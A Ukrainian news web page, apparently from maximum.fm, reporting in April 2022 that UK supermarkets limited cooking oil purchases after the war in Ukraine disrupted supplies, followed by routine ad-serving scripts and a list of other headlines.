<body><p>Супермакети Великобританії прийняли рішення щодо обмеження кількості олії, яку можуть придбати покупці за один раз. Відповідно до інформації від<a rel="nofollow" target="_blank" href="https://www.bloomberg.com/news/articles/2022-04-23/supermarkets-limit-cooking-oil-purchases-after-supplies-hit-by-ukraine-war"> Bloomberg,</a> мережі Waitrose та Morrisons дозволяють купити лише дві пляшки олії в одні руки, а у Tesco – три.</p>
<p class="read-also">І ще: <a data-url="https://maximum.fm/indeks-borshchu-os-naskilki-zrosla-vartist-produktiv-v-ukrayini-za-chas-vijni_n203429" class="ajaxLink" href="https://maximum.fm/indeks-borshchu-os-naskilki-zrosla-vartist-produktiv-v-ukrayini-za-chas-vijni_n203429">Індекс борщу: ось наскільки зросла вартість продуктів в Україні за час війни</a></p>
<p>Така несподіванка для клієнтів цілком очікувана загалом, адже чимала частина соняшникової олії на полицях британських магазинах надходила саме з України. А війна, яку розгорнула РФ, створила проблеми з ланцюгом постачань. Перебої з експортом призвели не лише до дефіциту, а й до підвищення попиту на альтернативні види жирів.</p>
<div class="news-photo">
<span class="lazyload-holder" style="padding-bottom: 70.9375%;">
<img width="640" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/04/62651c4f960a8736100700.jpg?w=640&amp;il&amp;q=65&amp;output=jpg&amp;v=46" data-sizes="auto" class="lazyload " style="" alt="У Великобританії ввели обмеження на продаж олії через війну в Україні - фото 503888">
<noscript>
        <img src="/uploads/media_news/2022/04/62651c4f960a8736100700.jpg?w=640&amp;il&amp;q=65&amp;output=jpg&amp;v=46"  alt="У Великобританії ввели обмеження на продаж олії через війну в Україні - фото 503888">
    </noscript>
</span>
<div class="photo-credits">У Великобританії ввели обмеження на продаж олії через війну в Україні / Quin Engle on Unsplash</div>
</div>
<p>До слова, обмеження стосуються не лише соняшникової, а й ріпакової та оливкової олії. Загалом вже ціни на олії піднялись на 7% за останні місяці, що на чверть дорожче, аніж у квітні 2021 року.</p>
<p class="read-also">Читайте також: <a data-url="https://maximum.fm/yak-zminilisya-zarplati-ukrayinciv-pid-chas-vijni-rezultati-opituvannya_n203500" class="ajaxLink" href="https://maximum.fm/yak-zminilisya-zarplati-ukrayinciv-pid-chas-vijni-rezultati-opituvannya_n203500">Як змінилися зарплати українців під час війни – результати опитування</a></p><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v652eace1692a40cfa3763df669d7439c1639079717194" integrity="sha512-Gi7xpJR8tSkrpF7aordPZQlW2DLtzUlZcumS8dMQjwDHEnw9I7ZLyiOj/6tZStRBGtGgN6ceN6cMH8z7etPGlw==" data-cf-beacon='{"rayId":"701702d69d8159a4","token":"cbfb020a8bb54073809b60aff8bcd962","version":"2021.12.0","si":100}' crossorigin="anonymous"></script>
</body>
<div class="add-scrollNews"></div>
<div class="hide-mobile-adv"></div>
<div class="follow-us-under-news">Читай максимум цікавих новин у
<a href="https://invite.viber.com/?g2=AQAKD4%2BB%2BNY530jWU5ccjyV3AZcJqO4yEMBH%2BHIFofGeS1%2F9tkreWHPw%2BiWAo2Hf&lang=uk" target="_blank">Viber</a>
</div>
<ul class="tags">
<li>Теги:</li>
<li>
<a class="ajaxLink" data-url="/ukrayina_t22822" title="" href="/ukrayina_t22822">Україна</a>
</li>
<li>
<a class="ajaxLink" data-url="/vijna_t22973" title="" href="/vijna_t22973">війна</a>
</li>
<li>
<a class="ajaxLink" data-url="/rosiya_t22763" title="" href="/rosiya_t22763">Росія</a>
</li>
<li>
<a class="ajaxLink" data-url="/ekonomika_t22735" title="" href="/ekonomika_t22735">Економіка</a>
</li>
<li>
<a class="ajaxLink" data-url="/velikobritaniya_t22942" title="" href="/velikobritaniya_t22942">Великобританія</a>
</li>
<li>
<a class="ajaxLink" data-url="/suspilstvo_t22771" title="" href="/suspilstvo_t22771">Суспільство</a>
</li>
<li>
<a class="ajaxLink" data-url="/yizha_t23025" title="" href="/yizha_t23025">Їжа</a>
</li>
</ul>
</div>
</div>
<hr>
<script>
        if (adCore.isSmallerThan(640)) {
            $('.fucked-desktop-adv').remove();
            adCore.defineDfpSlot({
                'name': '/56301415/maximum_promoArticle',
                'sizes': [1, 1],
                'id': 'div-gpt-ad-1513328055277-0',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function (e) {
                    dfpAdSlots['promoArticle'] = e.slot;
                    if (!e.isEmpty) {
                        document.getElementById('newsListPromoArticle').style.display = 'block';
                    } else {
                        console.log('Empty Promo')
                    }
                }
            });
        }
</script>
<div id="newsListPromoArticle" style="display: none" class="fucked-mobile-adv">
<div id='div-gpt-ad-1513328055277-0'>
<script type='text/javascript'>
            if (adCore.isSmallerThan(640)) {
                googletag.cmd.push(function () {
                    googletag.display('div-gpt-ad-1513328055277-0');
                });
            }
        </script>
</div>
</div>
<div class="partner-recomendation">
<hr>
<div class="title">
<span class="replace-h3">пропозиції партнерів</span>
</div>
</div>

<script>
    function initPartnerRecommendation (){
        var node = document.createElement("div");
        node.style.textAlign = '-webkit-center';
        node.innerHTML = "<div id='div-gpt-ad-1619016064260-0'></div><div id='div-gpt-ad-1619016119630-0'></div>";
        var summary = document.querySelector(".partner-recomendation");
        summary.after(node);
        var slotId;
        var slotSize;
        var wrapperId;
        if (window.innerWidth < 640) {
            slotId = '/56301415/maximum_mobile_afterNews';
            slotSize = [300, 250];
            wrapperId = 'div-gpt-ad-1619016064260-0';
        } else {
            slotId = '/56301415/maximum_afterNews';
            slotSize = [[1, 1], [600, 300]];
            wrapperId = 'div-gpt-ad-1619016119630-0';
        }
        adCore.defineDfpSlot({
            'name': slotId,
            'sizes': slotSize,
            'id': wrapperId,
            'targeting': [
                ['pageType', adCore.getPageName()],
                                ['newsId', '203564'],
                ['tagId', 'Україна,війна,Росія,Економіка,Великобританія,Суспільство,Їжа,Новини'],
                            ],
            'callback': function (e) {
                if(e.isEmpty){
                    console.log('EMPTY DFP afterNews')
                    var dfpDiv = document.getElementById(wrapperId);
                    summary.style.display = 'none';
                    dfpDiv.style.display = 'none';
                }
            }
        });

        var wrapperNode = document.getElementById(wrapperId);
        if (window.innerWidth < 640) {
                googletag.cmd.push(function () {
                    googletag.display(wrapperId);
                });
            wrapperNode.setAttribute('style', 'width: 300px; height: 250px;');
            summary.style.textAlign = '-webkit-center';
        } else {
                googletag.cmd.push(function () {
                    googletag.display(wrapperId);
                });
        }
    }

observer(".follow-us-under-news", initPartnerRecommendation)

</script>

</div>
<div id="load-news-container"></div>
</div>
<div class="columns show-for-large large-4">
<div id="radio24_300x100" style="display: none">
<script>
        if(adCore.isLargerThan(1024)) {
            adCore.defineDfpSlot({
                'name': '/113579682/radio24_300x100',
                'sizes': [300, 100],
                'id': 'div-gpt-ad-1473750613519-0',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function(e) {
                    if(!e.isEmpty){
                        document.getElementById('radio24_300x100').style.display = 'block';
                    } else {
                        console.log('Empty radio24_300x100')
                    }
                }
            });
        }
</script>
<div class="mobile-300-reklama">
<div id='div-gpt-ad-1473750613519-0'>
<script type='text/javascript'>
                if (adCore.isLargerThan(1024)) {
                    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1473750613519-0'); });
                }
        </script>
</div>
</div> </div>
<script>
        if (adCore.isLargerThan(1024)) {
            $('.fucked-mobile-adv').remove();
            adCore.defineDfpSlot({
                'name': '/56301415/maximum_promoArticle',
                'sizes': [1, 1],
                'id': 'div-gpt-ad-1513328055277-0-1',
                'targeting': adCore.targeting.getAll(),
                'refreshEventName': 'historyChange',
                'callback': function (e) {
                    dfpAdSlots['promoArticle'] = e.slot;
                    if (!e.isEmpty) {
                        document.getElementById('newsListPromoArticle').style.display = 'block';
                    } else {
                        console.log("EMPTY DESKTOP PROMO")
                    }
                }
            });
        }
</script>
<div id="newsListPromoArticle" style="display: none" class="fucked-desktop-adv">
<div id='div-gpt-ad-1513328055277-0-1'>
<script type='text/javascript'>
                if (adCore.isLargerThan(1024)) {
                    googletag.cmd.push(function () {
                        googletag.display('div-gpt-ad-1513328055277-0-1');
                    });
                }
        </script>
</div>
</div>
<div style="margin-top: 20px;" id="radio24_300x250_top">

<div id="M378454ScriptRootC662077">
<div id="M378454PreloadC662077"></div>
<script>
            var D = new Date(), d = document, b = 'body', ce = 'createElement', ac = 'appendChild', st = 'style',
                ds = 'display', n = 'none', gi = 'getElementById', lp = d.location.protocol,
                wp = lp.indexOf('http') == 0 ? lp : 'https:';
            var i = d[ce]('iframe');
            i[st][ds] = n;
            d[gi]("M378454ScriptRootC662077")[ac](i);
            try {
                var iw = i.contentWindow.document;
                iw.open();
                iw.writeln("<ht" + "ml><bo" + "dy></bo" + "dy></ht" + "ml>");
                iw.close();
                var c = iw[b];
            } catch (e) {
                var iw = d;
                var c = d[gi]("M378454ScriptRootC662077");
            }
            var dv = iw[ce]('div');
            dv.id = "MG_ID";
            dv[st][ds] = n;
            dv.innerHTML = 662077;
            c[ac](dv);
            var s = iw[ce]('script');
            s.async = 'async';
            s.defer = 'defer';
            s.charset = 'utf-8';
            s.src = wp + "//jsc.marketgid.com/1/m/1.maximum.fm.662077.js?t=" + D.getYear() + D.getMonth() + D.getUTCDate() + D.getUTCHours();
            c[ac](s);
    </script>
</div>  </div>
<div class="news-list-wrapper" id="news-list-wrapper" data-main="0">
<script data-cfasync="false">
    if (window.innerWidth < 640) {
        const removeElements = (elms) => elms.forEach(el => el.remove());
        removeElements(document.querySelectorAll('.news-list-wrapper'));
    }
</script>
<span class="replace-h3"><a class="ajaxLink" data-url="/novini_t2" title="novina" href="/novini_t2">Новини</a></span>
<ul class="tabs sort-list " data-tabs id="news-list-tabs">
<li data-height-set="false" id="top-list-li" class="tabs-title"><a href="#top-list">Головні</a></li>
<li class="tabs-title is-active"><a href="#last-list" aria-selected="true">Останні</a></li>
</ul>
<div class="tabs-content" data-tabs-content="news-list-tabs">
<div class="tabs-panel is-active" id="last-list">
<button id="last-news-back-less-btn" class="border-button scroll-news-list more-news revers hide-button">Попередні новини
</button>
<div class="last-news-list-wrapper overflow-wrapper">
<ul data-position="0" class="news-list news-list-last-ul" id="ph" style="top:0">
<li data-published-date="2022-04-25 14:51:00" title="" class="  important  ">
<a target="_self" data-url="/ukrayinsku-knigu-majya-ta-yiyi-mami-vidali-u-6-krayinah-koshti-vid-prodazhu-dlya-ukrayini_n203577" class="ajaxLink" href="/ukrayinsku-knigu-majya-ta-yiyi-mami-vidali-u-6-krayinah-koshti-vid-prodazhu-dlya-ukrayini_n203577">
<div class="time">14:51</div>
<div class="news-title">
Українську книгу &quot;Майя та її мами&quot; видали у 6 країнах, кошти від продажу – для України
</div>
</a>
</li>

<li data-published-date="2022-04-25 14:25:00" title="" class="  photo  ">
<a target="_self" data-url="/yak-rosiyani-ogidno-namagalis-zamesti-slidi-udariv-po-odesi_n203580" class="ajaxLink" href="/yak-rosiyani-ogidno-namagalis-zamesti-slidi-udariv-po-odesi_n203580">
<div class="time">14:25</div>
<div class="news-title">
Як росіяни огидно намагались замести сліди ударів по Одесі
</div>
</a>
</li>
<li data-published-date="2022-04-25 13:56:00" title="" class="  video  ">
<a target="_self" data-url="/fortecya-dlya-tisyachi-simej-tina-karol-pokazala-davnij-vistup-na-azovstali_n203579" class="ajaxLink" href="/fortecya-dlya-tisyachi-simej-tina-karol-pokazala-davnij-vistup-na-azovstali_n203579">
<div class="time">13:56</div>
<div class="news-title">
&quot;Фортеця для тисячі сімей&quot;: Тіна Кароль показала давній виступ на Азовсталі
</div>
</a>
</li>
<li data-published-date="2022-04-25 13:25:00" title="" class="  photo  ">
<a target="_self" data-url="/hotili-posvyatiti-pasku-v-ukrayinskij-cerkvi-zsu-znishchili-chergovu-grupu-okupantiv---foto_n203578" class="ajaxLink" href="/hotili-posvyatiti-pasku-v-ukrayinskij-cerkvi-zsu-znishchili-chergovu-grupu-okupantiv---foto_n203578">
<div class="time">13:25</div>
<div class="news-title">
&quot;Хотіли посвятити паску в українській церкві&quot;: ЗСУ знищили чергову групу окупантів – фото
</div>
</a>
</li>

<li data-published-date="2022-04-25 12:54:00" title="" class="  with-photo  ">
<a target="_self" data-url="/pogoda-v-ukrayini-26-kvitnya-sinoptik-poperedila-pro-temperaturnij-kontrast_n203575" class="ajaxLink" href="/pogoda-v-ukrayini-26-kvitnya-sinoptik-poperedila-pro-temperaturnij-kontrast_n203575">
<div class="time">12:54</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/04/6266713ad3845725115227.jpg?w=300&amp;h=100&amp;il&amp;q=65&amp;output=jpg&amp;v=46" data-sizes="auto" class="lazyload " style="" alt="Прогноз погоди на 26 квітня">
<noscript>
        <img src="/uploads/media_news/2022/04/6266713ad3845725115227.jpg?w=300&amp;h=100&amp;il&amp;q=65&amp;output=jpg&amp;v=46"  alt="Прогноз погоди на 26 квітня">
    </noscript>
</span>
Погода в Україні 26 квітня: синоптик попередила про температурний контраст
</div>
</a>
</li>
<li data-published-date="" title="" class="with-large-photo  photo video  ">
<a target="_self" data-url="/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167" class="ajaxLink" href="/privitannya-z-dnem-narodzhennya-najkrashchi-vitannya-ukrayinskoyu-movoyu_n140167">
<div class="time"></div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="169" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2019/03/5c8a3a3175fc8135803913.png?w=300&amp;h=169&amp;il&amp;q=65&amp;output=jpg&amp;v=46" data-sizes="auto" class="lazyload " style="" alt="З днем народження!">
<noscript>
        <img src="/uploads/media_news/2019/03/5c8a3a3175fc8135803913.png?w=300&amp;h=169&amp;il&amp;q=65&amp;output=jpg&amp;v=46"  alt="З днем народження!">
    </noscript>
</span>
З Днем народження: ТОП 75 привітань у віршах, прозі та смс українською
 </div>
</a>
</li>
<li data-published-date="2022-04-25 12:23:00" title="" class="   ">
<a target="_self" data-url="/ryanair-planuye-vidnovlennya-polotiv-nad-ukrayinoyu-koli-ce-vidbudetsya_n203572" class="ajaxLink" href="/ryanair-planuye-vidnovlennya-polotiv-nad-ukrayinoyu-koli-ce-vidbudetsya_n203572">
<div class="time">12:23</div>
<div class="news-title">
Ryanair планує відновлення польотів над Україною: коли це відбудеться
</div>
</a>
</li>
<li data-published-date="2022-04-25 11:51:00" title="" class="  important  ">
<a target="_self" data-url="/yak-znajti-zhitlo-v-ukrayini-ta-za-kordonom-dobirka-onlajn-servisiv_n202926" class="ajaxLink" href="/yak-znajti-zhitlo-v-ukrayini-ta-za-kordonom-dobirka-onlajn-servisiv_n202926">
<div class="time">11:51</div>
<div class="news-title">
Як знайти житло в Україні та за кордоном: добірка онлайн-сервісів
</div>
</a>
</li>
<li data-published-date="2022-04-25 11:22:00" title="" class="   ">
<a target="_self" data-url="/yak-znajti-motivaciyu-v-vazhki-momenti-v-zhitti-prosta-i-diyeva-tehnika_n203328" class="ajaxLink" href="/yak-znajti-motivaciyu-v-vazhki-momenti-v-zhitti-prosta-i-diyeva-tehnika_n203328">
<div class="time">11:22</div>
<div class="news-title">
Як знайти мотивацію у важкі моменти в житті: проста і дієва техніка
</div>
</a>
</li>
<li data-published-date="2022-04-25 10:52:00" title="" class="  video  ">
<a target="_self" data-url="/7-multfilmiv-pro-velikden-dlya-ditej-ukrayinskoyu-yak-rozkazati-ditini-pro-pashu-video_n191436" class="ajaxLink" href="/7-multfilmiv-pro-velikden-dlya-ditej-ukrayinskoyu-yak-rozkazati-ditini-pro-pashu-video_n191436">
<div class="time">10:52</div>
<div class="news-title">
7 мультфільмів про Великдень для дітей українською: як розказати дитині про Пасху (відео)
</div>
</a>
</li>
<li data-published-date="2022-04-25 10:25:00" title="" class="  video  ">
<a target="_self" data-url="/ukrayinci-duzhe-gostinni-yak-nashi-bijci-znishchuyut-vorozhi-bmp---vognyane-video_n203571" class="ajaxLink" href="/ukrayinci-duzhe-gostinni-yak-nashi-bijci-znishchuyut-vorozhi-bmp---vognyane-video_n203571">
<div class="time">10:25</div>
<div class="news-title">
&quot;Українці дуже гостинні&quot;: як наші бійці знищують ворожі БМП – вогняне відео
</div>
</a>
</li>
<li data-published-date="2022-04-25 09:52:00" title="" class="  with-photo video  ">
<a target="_self" data-url="/ti-moye-serdenko-ya-ne-mozhu-zhiti-bez-serdenka-z-yakogo-filmu-cya-fraza_n203490" class="ajaxLink" href="/ti-moye-serdenko-ya-ne-mozhu-zhiti-bez-serdenka-z-yakogo-filmu-cya-fraza_n203490">

<div class="time">09:52</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/04/626105454591f748426049.jpg?w=300&amp;h=100&amp;il&amp;q=65&amp;output=jpg&amp;v=46" data-sizes="auto" class="lazyload " style="" alt="Картина &quot;ти моє серденько&quot;">
<noscript>
        <img src="/uploads/media_news/2022/04/626105454591f748426049.jpg?w=300&amp;h=100&amp;il&amp;q=65&amp;output=jpg&amp;v=46"  alt="Картина &quot;ти моє серденько&quot;">
    </noscript>
</span>
&quot;Ти моє серденько, я не можу жити без серденька&quot;: з якого фільму ця фраза
</div>
</a>
</li>
<li data-published-date="2022-04-25 09:21:00" title="" class="  important  ">
<a target="_self" data-url="/kartinki-z-dnem-dochki-vitalni-listivki-i-vidkritki_n188493" class="ajaxLink" href="/kartinki-z-dnem-dochki-vitalni-listivki-i-vidkritki_n188493">
<div class="time">09:21</div>
<div class="news-title">
Картинки з Днем дочки 2022: вітальні листівки і відкритки
</div>
</a>
</li>
<li data-published-date="2022-04-25 08:53:00" title="" class="   ">
<a target="_self" data-url="/simptom-fantomnoyi-sireni-shcho-z-cim-robiti_n202359" class="ajaxLink" href="/simptom-fantomnoyi-sireni-shcho-z-cim-robiti_n202359">
<div class="time">08:53</div>
<div class="news-title">
Симптом фантомної сирени: що з цим робити
</div>
</a>
</li>

<li data-published-date="" title="" class="with-large-photo  video important  ">
<a target="_self" data-url="/ukrayinska-muzika-2021-roku-rejting-top-50-najkrashchih-pisen-vid-radio-maksimum_n199384" class="ajaxLink" href="/ukrayinska-muzika-2021-roku-rejting-top-50-najkrashchih-pisen-vid-radio-maksimum_n199384">
<div class="time"></div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="169" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2021/12/61bc6728088ae150617869.png?w=300&amp;h=169&amp;il&amp;q=65&amp;output=jpg&amp;v=46" data-sizes="auto" class="lazyload " style="" alt="Найкращі українські пісні 2022 року">
<noscript>
        <img src="/uploads/media_news/2021/12/61bc6728088ae150617869.png?w=300&amp;h=169&amp;il&amp;q=65&amp;output=jpg&amp;v=46"  alt="Найкращі українські пісні 2022 року">
    </noscript>
</span>
Українська музика 2021 року: рейтинг ТОП 50 найкращих пісень від Радіо МАКСИМУМ
</div>
</a>
</li>
<li data-published-date="2022-04-25 08:26:00" title="" class="  important  ">
<a target="_self" data-url="/polivanij-ponedilok-tradiciyi-i-obryadi-shcho-ne-mozhna-robiti_n159589" class="ajaxLink" href="/polivanij-ponedilok-tradiciyi-i-obryadi-shcho-ne-mozhna-robiti_n159589">
<div class="time">08:26</div>
<div class="news-title">
Поливаний понеділок 2022: традиції і обряди, що не можна робити
</div>
</a>
</li>
<li class="month">
24 квітня
</li>
<li data-published-date="2022-04-24 20:54:00" title="" class="  video  ">
<a target="_self" data-url="/zinchenko-zrobiv-rezultativnu-peredachu-v-chempionati-angliyi-video-pasu_n203560" class="ajaxLink" href="/zinchenko-zrobiv-rezultativnu-peredachu-v-chempionati-angliyi-video-pasu_n203560">
<div class="time">20:54</div>
<div class="news-title">
Зінченко зробив результативну передачу в чемпіонаті Англії: відео пасу
</div>
</a>
</li>
<li data-published-date="2022-04-24 20:20:00" title="" class="  with-photo important  ">
<a target="_self" data-url="/25-kvitnya-yake-sogodni-svyato-tradiciyi-zaboroni-i-prikmeti_n203563" class="ajaxLink" href="/25-kvitnya-yake-sogodni-svyato-tradiciyi-zaboroni-i-prikmeti_n203563">
<div class="time">20:20</div>
<div class="news-title">
<span class="lazyload-holder">
<img width="300" height="100" src="/admin/images/transparent-pixel.png" data-src="/uploads/media_news/2022/04/62651e448931f717091618.png?w=300&amp;h=100&amp;il&amp;q=65&amp;output=jpg&amp;v=46" data-sizes="auto" class="lazyload " style="" alt="25 квітня – понеділок">
<noscript>
        <img src="/uploads/media_news/2022/04/62651e448931f717091618.png?w=300&amp;h=100&amp;il&amp;q=65&amp;output=jpg&amp;v=46"  alt="25 квітня – понеділок">
    </noscript>
</span>
25 квітня 2022 – яке сьогодні релігійне свято: традиції, заборони і прикмети
</div>
</a>
</li>
<li data-published-date="2022-04-24 19:39:00" title="" class="  photo important  ">
<a target="_self" data-url="/siluet-krejsera-moskva-na-dni-chornogo-morya-pokazali-na-suputnikovih-foto_n203562" class="ajaxLink" href="/siluet-krejsera-moskva-na-dni-chornogo-morya-pokazali-na-suputnikovih-foto_n203562">
<div class="time">19:39</div>
<div class="news-title">
Силует крейсера &quot;Москва&quot; на дні Чорного моря показали на супутникових фото
</div>
</a>
</li>
<li data-published-date="2022-04-24 18:56:00" title="" class="   ">
<a target="_self" data-url="/top-5-servisiv-dlya-poshuku-roboti-pid-chas-vijni_n203310" class="ajaxLink" href="/top-5-servisiv-dlya-poshuku-roboti-pid-chas-vijni_n203310">
<div class="time">18:56</div>
<div class="news-title">
ТОП 5 сервісів для пошуку роботи під час війни
</div>
</a>
</li>
<li data-published-date="2022-04-24 18:18:00" title="" class="  photo  ">
<a target="_self" data-url="/yak-pracyuvatime-metro-kiyeva-pid-chas-povitryanih-trivog_n203559" class="ajaxLink" href="/yak-pracyuvatime-metro-kiyeva-pid-chas-povitryanih-trivog_n203559">
<div class="time">18:18</div>
<div class="news-title">
Як працюватиме метро Києва під час повітряних тривог
</div>
</a>
</li>
<li data-published-date="2022-04-24 17:51:00" title="" class="   ">
<a target="_self" data-url="/u-mincifri-rozpovili-yak-oformiti-status-vpo-ta-otrimati-finansovu-dopomogu_n203462" class="ajaxLink" href="/u-mincifri-rozpovili-yak-oformiti-status-vpo-ta-otrimati-finansovu-dopomogu_n203462">
 <div class="time">17:51</div>
<div class="news-title">
У Мінцифрі розповіли, як оформити статус ВПО та отримати фінансову допомогу
</div>
</a>
</li>
<li data-published-date="2022-04-24 17:23:00" title="" class="  photo  ">
<a target="_self" data-url="/polk-azov-opublikuvav-svizhi-foto-blokadnogo-mariupolya_n203557" class="ajaxLink" href="/polk-azov-opublikuvav-svizhi-foto-blokadnogo-mariupolya_n203557">
<div class="time">17:23</div>
<div class="news-title">
Полк Азов опублікував свіжі фото блокадного Маріуполя
</div>
</a>
</li>
<li data-published-date="2022-04-24 16:50:00" title="" class="  photo  ">
<a target="_self" data-url="/poyizd-ukrayinskogo-virobnictva-virushiv-u-pershij-rejs-yak-viglyadayut-vagoni_n203556" class="ajaxLink" href="/poyizd-ukrayinskogo-virobnictva-virushiv-u-pershij-rejs-yak-viglyadayut-vagoni_n203556">
<div class="time">16:50</div>
<div class="news-title">
Поїзд українського виробництва вирушив у перший рейс: як виглядають вагони
</div>
</a>
</li>
<li data-published-date="2022-04-24 16:22:00" title="" class="  last ">
<a target="_self" data-url="/v-ukrposhti-ne-viklyuchayut-vipusk-marki-z-putinim-nazvani-umovi_n203552" class="ajaxLink" href="/v-ukrposhti-ne-viklyuchayut-vipusk-marki-z-putinim-nazvani-umovi_n203552">
<div class="time">16:22</div>
<div class="news-title">
В Укрпошті не виключають випуск марки з Путіним: названі умови
</div>
</a>
</li>
</ul>
</div>
<button data-limit="25" class="border-button scroll-news-list more-news last">Більше новин
</button>
</div>
<div class="tabs-panel" id="top-list">
<button data-scrolled-count="0" data-scrolled-li-index="0" id="important-news-back-less-btn" class="border-button scroll-news-list more-news revers hide-button">Попередні новини
</button>
<div class="important-news-list-wrapper overflow-wrapper">
<ul data-position="0" class="news-list-important-ul news-list" style="top:0">
<li data-published-date="2022-04-25 14:51:00" class="   ">
<a data-url="/ukrayinsku-knigu-majya-ta-yiyi-mami-vidali-u-6-krayinah-koshti-vid-prodazhu-dlya-ukrayini_n203577" title="" class="ajaxLink" target="_self" href="/ukrayinsku-knigu-majya-ta-yiyi-mami-vidali-u-6-krayinah-koshti-vid-prodazhu-dlya-ukrayini_n203577">
<div class="time">14:51</div>
<div class="news-title">
Українську книгу &quot;Майя та її мами&quot; видали у 6 країнах, кошти від продажу – для України
</div>
</a>
</li>
<li data-published-date="2022-04-25 11:51:00" class="   ">
<a data-url="/yak-znajti-zhitlo-v-ukrayini-ta-za-kordonom-dobirka-onlajn-servisiv_n202926" title="" class="ajaxLink" target="_self" href="/yak-znajti-zhitlo-v-ukrayini-ta-za-kordonom-dobirka-onlajn-servisiv_n202926">
<div class="time">11:51</div>
<div class="news-title">
Як знайти житло в Україні та за кордоном: добірка онлайн-сервісів
</div>
</a>
</li>

<li data-published-date="2022-04-25 08:26:00" class="   ">
<a data-url="/polivanij-ponedilok-tradiciyi-i-obryadi-shcho-ne-mozhna-robiti_n159589" title="" class="ajaxLink" target="_self" href="/polivanij-ponedilok-tradiciyi-i-obryadi-shcho-ne-mozhna-robiti_n159589">
<div class="time">08:26</div>
<div class="news-title">
Поливаний понеділок 2022: традиції і обряди, що не можна робити
</div>
</a>
</li>
<li class="month">
24 квітня
</li>
<li data-published-date="2022-04-24 19:39:00" class=" photo   ">
<a data-url="/siluet-krejsera-moskva-na-dni-chornogo-morya-pokazali-na-suputnikovih-foto_n203562" title="" class="ajaxLink" target="_self" href="/siluet-krejsera-moskva-na-dni-chornogo-morya-pokazali-na-suputnikovih-foto_n203562">
<div class="time">19:39</div>
<div class="news-title">
Силует крейсера &quot;Москва&quot; на дні Чорного моря показали на супутникових фото
</div>
</a>
</li>
<li data-published-date="2022-04-24 15:19:00" class=" photo   ">
<a data-url="/yak-ne-stati-zhertvami-kvartirnih-kradiyiv-na-velikden-rekomendaciyi-vid-policiyi_n203551" title="" class="ajaxLink" target="_self" href="/yak-ne-stati-zhertvami-kvartirnih-kradiyiv-na-velikden-rekomendaciyi-vid-policiyi_n203551">
<div class="time">15:19</div>
<div class="news-title">
Як не стати жертвами квартирних крадіїв на Великдень: рекомендації від поліції
</div>
</a>
</li>

<li data-published-date="2022-04-24 10:22:00" class=" video   ">
<a data-url="/prosimo-v-boga-shchob-zdijsnilas-nasha-mriya-zelenskij-privitav-ukrayinciv-z-velikodnem_n203553" title="" class="ajaxLink" target="_self" href="/prosimo-v-boga-shchob-zdijsnilas-nasha-mriya-zelenskij-privitav-ukrayinciv-z-velikodnem_n203553">
<div class="time">10:22</div>
<div class="news-title">
Просимо в Бога, щоб здійснилась наша мрія: Зеленський привітав українців з Великоднем
</div>
</a>
</li>
<li data-published-date="2022-04-24 09:25:00" class="   ">
<a data-url="/privitannya-z-velikodnem-u-prozi-krasivi-pobazhannya-svoyimi-slovami_n139029" title="" class="ajaxLink" target="_self" href="/privitannya-z-velikodnem-u-prozi-krasivi-pobazhannya-svoyimi-slovami_n139029">
<div class="time">09:25</div>
<div class="news-title">
Привітання з Великоднем у прозі: вітання з Пасхою 2022 своїми словами
</div>
</a>
</li>
<li data-published-date="2022-04-24 08:19:00" class="   ">
<a data-url="/ne-slovom-a-dilom-yak-kozhen-z-nas-mozhe-dopomogti-ukrayinskij-armiyi_n201793" title="" class="ajaxLink" target="_self" href="/ne-slovom-a-dilom-yak-kozhen-z-nas-mozhe-dopomogti-ukrayinskij-armiyi_n201793">
<div class="time">08:19</div>
<div class="news-title">
Не словом, а ділом: як кожен з нас може допомогти українській армії
</div>
</a>
</li>
<li class="month">
 23 квітня
</li>
<li data-published-date="2022-04-23 20:19:00" class="   ">
<a data-url="/u-mincifri-vidpovili-na-poshireni-pitannya-yaki-stosuyutsya-vnutrishno-peremishchenih-osib_n203548" title="" class="ajaxLink" target="_self" href="/u-mincifri-vidpovili-na-poshireni-pitannya-yaki-stosuyutsya-vnutrishno-peremishchenih-osib_n203548">
<div class="time">20:19</div>
<div class="news-title">
У Мінцифри відповіли на поширені питання, які стосуються внутрішньо переміщених осіб
</div>
</a>
</li>
<li data-published-date="2022-04-23 18:21:00" class="   ">
<a data-url="/kozhen-tretij-ukrayinec-zalishayetsya-v-krayini-adzhe-pokidati-yiyi--neprijnyatno-opituvannya_n203544" title="" class="ajaxLink" target="_self" href="/kozhen-tretij-ukrayinec-zalishayetsya-v-krayini-adzhe-pokidati-yiyi--neprijnyatno-opituvannya_n203544">
<div class="time">18:21</div>
<div class="news-title">
Кожен третій українець залишається в країні, адже покидати її – неприйнятно: опитування
</div>
</a>
</li>
<li data-published-date="2022-04-23 15:23:00" class=" video   ">
<a data-url="/menshe-sliz-bilshe-dij-ukrayinki-znyali-potuzhne-video-na-pisnyu-kazka-plakala_n203537" title="" class="ajaxLink" target="_self" href="/menshe-sliz-bilshe-dij-ukrayinki-znyali-potuzhne-video-na-pisnyu-kazka-plakala_n203537">
<div class="time">15:23</div>
<div class="news-title">
Менше сліз, більше дій: українки зняли потужне відео на пісню KAZKA &quot;Плакала&quot;
</div>
</a>
</li>
<li data-published-date="2022-04-23 12:51:00" class=" video   ">
<a data-url="/borshch-sekretnij-ingrediyent-divitsya-film-pro-unikalnu-ukrayinu-vid-yevgena-klopotenka_n203533" title="" class="ajaxLink" target="_self" href="/borshch-sekretnij-ingrediyent-divitsya-film-pro-unikalnu-ukrayinu-vid-yevgena-klopotenka_n203533">
<div class="time">12:51</div>
<div class="news-title">
Борщ. Секретний інгредієнт: дивіться фільм про унікальну Україну від Євгена Клопотенка
</div>
</a>
</li>
